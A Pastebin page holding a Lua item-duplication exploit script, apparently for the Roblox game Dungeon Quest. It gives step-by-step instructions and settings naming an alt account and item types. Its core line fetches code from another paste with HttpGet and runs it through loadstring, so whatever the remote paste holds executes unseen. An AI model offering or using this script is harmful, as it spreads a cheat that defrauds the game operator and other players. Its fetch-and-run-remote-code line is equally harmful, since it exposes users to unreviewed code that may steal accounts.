Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --DUNGEON QUEST DUPE SCRIPT--
- --INSTRUCTIONS--
- --Step 1: Edit _G.ItemReceiver to The Name Of Ur Alt Which Would Get The Items Your Main Traded You--
- --Step 2: Configure the Settings In _G.TypesToDupe To Choose What You Would Like To Dupe--
- --Step 3: Join Dungeon Quest On Your Main Using The Website (Normal Roblox)--
- --Step 4: Wait For The Trade On Your Alt, Then Press Accept--
- --Step 5: Once Ur Main Is In The Dungeon, Finish the DUNGEON--
- --SCRIPT--
- _G.ItemReceiver = "SynapseTesting0002"
- _G.TypesToDupe = {
- ["Weapons"] = true,
- ["Helmets"] = false,
- ["Chests"] = false,
- ["Spells"] = false
- }
- loadstring(game:HttpGet('https://pastebin.com/raw/MEHPs1Xf', true))()
- --also disclaimer: this dupe has a success rate, there is a small chance that the duplicated items will be deleted (but not the originals)--
- --DO NOT DUPE ORBITAL OUTPOST ITEMS!--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement